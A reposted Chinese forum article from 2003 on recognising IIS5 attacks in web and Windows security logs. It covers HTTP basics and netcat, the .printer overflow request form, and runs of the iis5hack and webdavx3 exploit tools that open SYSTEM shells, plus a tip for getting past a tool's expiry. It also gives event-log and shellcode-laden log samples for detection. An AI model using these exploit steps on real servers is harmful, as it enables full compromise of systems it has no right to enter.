发新话题
打印

[转载]IIS攻击与日志

[转载]IIS攻击与日志

文章作者:翼手龙

不管在操作系统上进行了多么精心的配置,不管网络的安全根基打的多么的好,运行其
上的脆弱的应用程序总是能轻松的将它们化为乌有。


INTERNET信息服务(IIS)是WINDOWS 2000服务器上应用最广泛的服务,作为微软的主
流WEB服务器,IIS遍布全球的服务器上,因此,几乎所有

的IIS漏洞都可能成为一次全球性蠕虫袭击的源头,漏洞发现----蠕虫来袭,几乎成了
WINDOWS 2000服务器大灾难的一般规律,尽管发现的漏洞

都已经一一提供了补丁,但是还是让很多网管和媒体手忙脚乱一阵,而我们要做好IIS
的安全防范,日志是很重要的安全检查手段之一,下面,

我们有必要首先了解一些IIS攻击的基本知识。



知识点之一:HTTP请求过程简介

浏览器一般是图形界面的,因此我们图形界面后面所发生的详细细节。
实际上,它的请求过程是这样的:首先,你看到的网址通过DNS来转换成的IP地址,你
的计算机会同这个IP地址建立TCP连接,连接建立后,就

开始HTTP请求过程了,

以下是一个完整的HTTP请求过程,首先我们点击http://www.chinaload.com/download/

Tue Aug 12 11:47:28 2003 正在连接 www.chinaload.com:80
Tue Aug 12 11:47:28 2003 正在连接 www.chinaload.com [IP=66.111.34.91:80]
Tue Aug 12 11:47:29 2003 已连接.
Tue Aug 12 11:47:29 2003 GET /download/  HTTP/1.1
Tue Aug 12 11:47:29 2003 Host: www.chinaload.com
Tue Aug 12 11:47:29 2003 Accept: */*
Tue Aug 12 11:47:29 2003 Referer: http://www.chinaload.com/download/
Tue Aug 12 11:47:29 2003 User-Agent: Mozilla/4.0 (compatible; MSIE 5.00;
Windows 98)

Tue Aug 12 11:47:30 2003 HTTP/1.1 200 OK
Tue Aug 12 11:47:30 2003 Date: Tue, 12 Aug 2003 04:46:42 GMT
Tue Aug 12 11:47:30 2003 Server: Apache
Tue Aug 12 11:47:30 2003 Last-Modified: Mon, 09 Jun 2003 02:47:17 GMT
Tue Aug 12 11:47:30 2003 Content-Type: text/plain

由于HTTP是基于文本,所以它非常容易看懂,在浏览器里我们输入的请求是这样的:
http://www.chinaload.com/download/
这是在请求打开虚拟目录里的DOWNLOAD目录,而这个虚拟目录实际上影射的是系统里的
一个实际目录:比如说是c:\wwwroot\download\

所以在服务器看来,这个请求就是这样的:

GET /download/  HTTP/1.1

这里举的例子是请求一个目录,请求一个文件也是一样的,比如说我们请求的是:
http://www.chinaload.com/download/index.html

在服务器看来是:
GET /download/index.html  HTTP/1.1

如果这个文件是存在的,而且服务器运行正常,那么服务器就会返回index.html的数
据,并通过浏览器对数据的解析,呈现出我们平时看到的

页面,在成功的获取了文件的数据的情况下,服务器会产生HTTP  200  OK的应答记
录。如果这个文件不存在就会产生404 notfound,如果权限

不够就会产生403 access denied,
其他的HTTP常见应答代码还包括:
202 Accepted 已经接受请求,但处理尚未完成;
301 Moved Permanently 客户请求的文档在其他地方,新的URL在Location头中给出,
浏览器应该自动地访问新的URL;
401 Unauthorized 客户试图未经授权访问受密码保护的页面。应答中会包含一个
WWW-Authenticate头,浏览器据此显示用户名字/密码对话框

,然后在填写合适的Authorization头后再次发出请求;
414 Request URI Too Long URI太长;
500 Internal Server Error 服务器遇到了意料不到的情况,不能完成客户的请求。



如果想得到一份完整的HTTP应答代码列表,可以在GOOGLE里搜索,网络上很多地方可以
提供该列表。



知识点之二:URL的十六进制编码

HTTP在URL的请求中允许使用十六进制编码来代替输入的ASCII字符。

常用的ASCII字符和十六进制编码的对应表:

ASCII             十六进制编码
/正斜线           %2F
\反斜线           %5C
空格            %20
+加号            %2B
.句点            %2E
?问号            %3C
:冒号            %3A

例如:对于www.bbs.com/data下的“BAK DATA FILE.DBA”的十六进制表达方式就是:

http://www.bbs.com/data/bak%20data%20file.dba




知识点之三:netcat的使用


netcat有”网络瑞士军刀“之称,我们在这里主要介绍一下它在WEB攻击中的应用。

首先,netcat允许原始的HTTP输入,这与IE等浏览器不同,IE浏览器会删除额外的输
入,例如“../../”,这会禁止部分遍历攻击。
其次,netcat也允许原始的HTTP输出,这样得到的服务器应答将会更全面、更细致,而
浏览器则只会显示HTML那些在源码里注释过的内容,忽

略了更重要的信息。


下面我们来看一个例子:

Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator>e:

E:\>
E:\>nc -vv 192.168.0.100 80
192.168.0.100: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.100] 80 (http) open
get / http/1.1

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Mon, 15 Dec 2003 03:51:30 GMT
Content-Type: text/html
Content-Length: 87

The parameter is incorrect.

sent 16, rcvd 224: NOTSOCK

E:\>

我们可以看到建立了连接以后,目标会告诉我们80端口开放,然后我们输入get /
http/1.1来请求WWWROOT里的默认文件,回车。

于是原始的HTTP应答便完整的显示在了屏幕上,包括IIS的类型和完整的脚本输出。


如果为了节省时间,提高速度,可以将需要输入的内容事先作成一个TXT文本,比如说
文件名是1.txt,然后使用
E:\>nc -vv 192.168.0.100 80 < 1.txt

可以得到相同的返回内容。

更多的有趣内容可以通过nc -h命令了解到,需要注意的一点是:netcat不能连接到被
SSL保护的WEB服务器。

目前最有威胁的IIS5攻击有两种,一种是IIS5缓冲区溢出,另外的一种是IIS拒绝服
务。


IIS5缓冲区溢出

我曾经粗略做了一个统计,WINDOWS涉及到溢出的漏洞稍微多于LINUX,而WINDOWS的大
量的溢出漏洞与IIS有关,所以没有IIS的WINDOWS的整体

安全性绝对要高于LINUX,这几句话涉及到了WINDOWS与LINUX之争,所以就不再多说
了,免得又引起无谓的“口水战”。

熟悉缓冲区溢出攻击必须对溢出的工作方式有所了解,由于本身溢出就是一个很大的课
题,所以我们只简单的介绍一下:如果一个程序没有限

制输入的字符长度或者检查输入长度是否正确,就会发生溢出。一个没有进行限制的输
入就有可能因为输入长度的问题“溢出”到CPU运行栈的

另一部分去,如果这个输入被精心的设计过,那么它可以被用来运行指定的代码。而
IIS运行的帐户环境是SYSTEM,所以通过溢出得到的是

SYSTEM权限,而SYSTEM权限是系统内的最高技术权限,因此IIS缓冲区溢出造成的灾难
往往是致命的。



IPP缓冲区溢出

这个漏洞比较早了,但是一直私下里认为这是一个很典型的IIS溢出漏洞攻击,所以又
翻了出来,这个漏洞存在于处理.printer文件的ISAPI过

滤器(c:\winnt\system32\msw3prt.dll),它为WIN2000提供INTERNET打印协议,即IPP
的支持,可实现对网络打印机的基于WEB的控制,

在.printer ISAPI请求中,在HTTP HOST:头中发送420字节的缓冲区,就会发生溢出,

如下:

GET /NULL.PRINTER  HTTP/1.0
HOST: [BUFFER为420个字符]


发生溢出后IIS异常终止,但是为了2000为了保障WEB的弹性运行,这时会自动重新运行
IIS(inetinfo.exe),在后面提供的日志里你可以充分

的注意到这一点。


互联网上流行的最成功的一个IPP漏洞利用工具是IIS5HACK,不过最近的这个工具的版
本好象都被加了木马。

操作如下:

E:\>iis5hack 192.168.0.87 80 0 1256
iis5 remote .printer overflow. writen by sunx
   http://www.sunx.org
   for test only, dont used to hack, :p


connecting...
sending...
checking...
Now you can telnet to 1256 port
good luck :)


E:\>

这时使用“telnet 192.168.0.87 1256”就可以连接到目标服务器上,我们可以看到目
标服务器系统装在H盘上。


http://www.sunx.org

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.

H:\WINNT\system32>


在这个过程里,IIS日志里一般不会出现记录,但是在事件查看器里的系统日志项目里
将会出现IIS各个组建停止的信息,安全项目里也将出现

以下的日志:



事件类型: 成功审核
事件来源: Security
事件种类: 系统事件
事件 ID: 515
日期:  2003-12-16
事件:  15:34:13
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
受信任的登录过程已经在本地安全机制机构注册。 将信任这个登录过程来提交登录申
请。

登录过程名:  \inetinfo.exe


事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 577
日期:  2003-12-16
事件:  15:34:13
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
调用的特许服务:
  服务器:  NT Local Security Authority / Authentication Service
  服务:  LsaRegisterLogonProcess()
  主要用户名: 123-DK8KIFN4NZR$
  主要域: SERVER
  主要登录 ID: (0x0,0x3E7)
  客户端用户名: 123-DK8KIFN4NZR$
  客户端域: SERVER
  客户端登录 ID: (0x0,0x3E7)
  特权: SeTcbPrivilege


事件类型: 成功审核
事件来源: Security
事件种类: 帐户登录
事件 ID: 680
日期:  2003-12-16
事件:  15:34:13
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
为登录所用的帐户: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
帐户名:
  IUSR_123-DK8KIFN4NZR
工作站:
  123-DK8KIFN4NZR


事件类型: 成功审核
事件来源: Security
事件种类: 登录/注销
事件 ID: 540
日期:  2003-12-16
事件:  15:34:13
用户:  123-DK8KIFN4NZR\IUSR_123-DK8KIFN4NZR
计算机: 123-DK8KIFN4NZR
描述:
成功的网络登录:
  用户名: IUSR_123-DK8KIFN4NZR
  域:  123-DK8KIFN4NZR
  登录 ID:  (0x0,0x17FBA)
  登录类型: 3
  登录过程: IIS
  身份验证程序包: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
  工作站名: 123-DK8KIFN4NZR




事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 576
日期:  2003-12-16
事件:  15:34:13
用户:  123-DK8KIFN4NZR\IUSR_123-DK8KIFN4NZR
计算机: 123-DK8KIFN4NZR
描述:
指派给新登录的特殊权限:
  用户名: IUSR_123-DK8KIFN4NZR
  域:  123-DK8KIFN4NZR
  登录 ID:  (0x0,0x17FBA)
  已指派:  SeChangeNotifyPrivilege

事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期:  2003-12-16
事件:  15:34:57
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
  新的过程 ID: 4282631840
  映象文件名: \WINNT\system32\dllhost.exe
  创建者过程 ID: 2258146112
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)

事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期:  2003-12-16
事件:  15:34:58
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
  新的过程 ID: 4280877088
  映象文件名: \WINNT\system32\cmd.exe
  创建者过程 ID: 4285625728
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)



从上面我们可以看出,在判断溢出攻击的时候,仅仅靠WEB日志还是不够的,因为在发
生溢出的时候,IIS多半已经被停止了,无法提供给我们

更多的线索,需要更好的对攻击进行分析的话,需要我们多方位的入手。



WebDAV远程缓冲区溢出漏洞

WebDAV 是 HTTP 规范的行业标准扩展。“WebDAV”中的“DAV”代表“分布式创作和版
本控制”。WebDAV 为授权用户提供了在 Web 服务器上

远程添加和管理内容的能力。IIS5 默认提供了对WebDAV的支持,通过WebDAV可以通过
HTTP向用户提供远程文件存储的服务。但是作为普通的

HTTP服务器,这个功能没有必要。

IIS5包含的WebDAV组件不充分检查传递给部分系统组件的数据,远程攻击者利用这个漏
洞对WebDAV进行缓冲区溢出攻击,可能以WEB进程权限在

系统上执行任意指令。IIS 5.0的WebDAV使用了ntdll.dll中的一些函数,而这些函数存
在一个缓冲区溢出漏洞。通过对WebDAV的畸形请求可以

触发这个溢出。成功利用这个漏洞可以获得LocalSystem权限。这意味着,入侵者可以
获得主机的完全控制能力。任何能够将 WebDAV 请求传输

到受影响的 Web 服务器的用户都可以尝试利用此弱点。由于 WebDAV 请求是在 HTTP
所在的同一端口(通常是端口 80)上传输,这实质上意

味着任何能够与受影响的服务器建立连接的用户都可以尝试利用此弱点。

网络上WebDAV攻击工具非常的多,使用也很简单,所以造成了前一段时间WEBDAV攻击泛
滥,

其中最著名的是WEBDAVX3,需要注意的是这个程序是有时间期限的,但是可以通过调整
系统时间的方法解决,比如说将时间调回2002年,这并不会影响这个程序的使用。

C:\>webdavx3 192.168.0.1
IIS WebDAV overflow remote exploit by isno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
try offset: 1
try offset: 2
try offset: 3
try offset: 4
try offset: 5
try offset: 6
try offset: 7
try offset: 8
try offset: 9
try offset: 10
try offset: 11
try offset: 12
try offset: 13
try offset: 14
try offset: 15
try offset: 16
try offset: 17
try offset: 18
try offset: 19
try offset: -1
try offset: -2
try offset: -3
waiting for iis restart....................... (IIS正在重起)
try offset: -4

在这一时候计算机会有一段长时间停止,只需要使用^C短开,就可以使用NC或者TELNET
连上去了。


C:\>nc -vv 192.168.0.1 7788
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.1] 7788 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>


以下是遭到WEBDAV溢出攻击后的WEB日志主要特征:




2003-12-16 05:51:38 192.168.0.235 - 192.168.0.87 80 LOCK

/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAA契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契
桘杲楜厐晞暭餽畠囸噖晟暭丽琀連愬傐晙邭愬咍炈咍邊咍

炊咍邊塒璪痘郖偘偐郃悙

ffilomidomfafdfgfhinhnlaljbeaaaaaalimmmmmmmmpdklojieaaaaaaipefpainlnpepppppp
gekbaaaaaaaaijehaigeijdnaaaaaaaamhefpeppppppppile

fpaidoiahijefpiloaaaabaaaoideaaaaaaibmgaabaaaaaolagibmgaaeaaaaailagdneoeoeoe
ohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfj

fihfokppogolpofifailhnpaijehpcmdileeceamafliaaaaaamhaaeeddccbbddmamdolomoihh
ppppppcecececeNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN -
400 -


在事件查看器里的系统日志项目里将会出现IIS各个组件停止的信息,安全项目里也将
出现

以下的日志:




事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期:  2003-12-16
事件:  13:52:02
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
  新的过程 ID: 4281625184
  映象文件名: \WINNT\system32\iisreset.exe
  创建者过程 ID: 2171497184
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)



事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期:  2003-12-16
事件:  13:52:03
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
  新的过程 ID: 2276659232
  映象文件名: \WINNT\system32\inetsrv\iisrstas.exe
  创建者过程 ID: 2244638496
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)


事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期:  2003-12-16
事件:  13:52:03
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
  新的过程 ID: 4274700320
  映象文件名: \WINNT\system32\inetsrv\inetinfo.exe
  创建者过程 ID: 2171497184
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)


事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 577
日期:  2003-12-16
事件:  13:52:03
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
调用的特许服务:
  服务器:  NT Local Security Authority / Authentication Service
  服务:  LsaRegisterLogonProcess()
  主要用户名: 123-DK8KIFN4NZR$
  主要域: SERVER
  主要登录 ID: (0x0,0x3E7)
  客户端用户名: 123-DK8KIFN4NZR$
  客户端域: SERVER
  客户端登录 ID: (0x0,0x3E7)
  特权: SeTcbPrivilege



事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 593
日期:  2003-12-16
事件:  13:52:10
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经退出某过程:
  过程 ID: 832
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)


事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 593
日期:  2003-12-16
事件:  13:52:16
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经退出某过程:
  过程 ID: 980
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)


事件类型: 成功审核
事件来源: Security
事件种类: 系统事件
事件 ID: 515
日期:  2003-12-16
事件:  13:52:25
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
受信任的登录过程已经在本地安全机制机构注册。 将信任这个登录过程来提交登录申
请。

登录过程名:  \inetinfo.exe

事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 577
日期:  2003-12-16
事件:  13:52:25
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
调用的特许服务:
  服务器:  NT Local Security Authority / Authentication Service
  服务:  LsaRegisterLogonProcess()
  主要用户名: 123-DK8KIFN4NZR$
  主要域: SERVER
  主要登录 ID: (0x0,0x3E7)
  客户端用户名: 123-DK8KIFN4NZR$
  客户端域: SERVER
  客户端登录 ID: (0x0,0x3E7)
  特权: SeTcbPrivilege



事件类型: 成功审核
事件来源: Security
事件种类: 帐户登录
事件 ID: 680
日期:  2003-12-16
事件:  13:52:25
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
为登录所用的帐户: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
帐户名:
  IUSR_123-DK8KIFN4NZR
工作站:
  123-DK8KIFN4NZR


事件类型: 成功审核
事件来源: Security
事件种类: 登录/注销
事件 ID: 540
日期:  2003-12-16
事件:  13:52:25
用户:  123-DK8KIFN4NZR\IUSR_123-DK8KIFN4NZR
计算机: 123-DK8KIFN4NZR
描述:
成功的网络登录:
  用户名: IUSR_123-DK8KIFN4NZR
  域:  123-DK8KIFN4NZR
  登录 ID:  (0x0,0x1D0EFE)
  登录类型: 3
  登录过程: IIS
  身份验证程序包: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
  工作站名: 123-DK8KIFN4NZR




事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 576
日期:  2003-12-16
事件:  13:52:25
用户:  123-DK8KIFN4NZR\IUSR_123-DK8KIFN4NZR
计算机: 123-DK8KIFN4NZR
描述:
指派给新登录的特殊权限:
  用户名: IUSR_123-DK8KIFN4NZR
  域:  123-DK8KIFN4NZR
  登录 ID:  (0x0,0x1D0EFE)
  已指派:  SeChangeNotifyPrivilege



事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期:  2003-12-16
事件:  13:52:25
用户:  NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
  新的过程 ID: 4276928544
  映象文件名: \WINNT\system32\cmd.exe
  创建者过程 ID: 4274700320
  用户名: 123-DK8KIFN4NZR$
  域:  SERVER
  登录 ID:  (0x0,0x3E7)


需要注意的是,在WEBDAV溢出的过程中IIS会产生多次重复启动,而在WEB的日志里并不
能看出这一点,而这一点在事件查看器里的系统日志里和安全日志里都可以清楚的看
到。


关于WEBDAV的防范措施与本主题无关,且网络上很多地方提供了,就不赘述了。
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

发新话题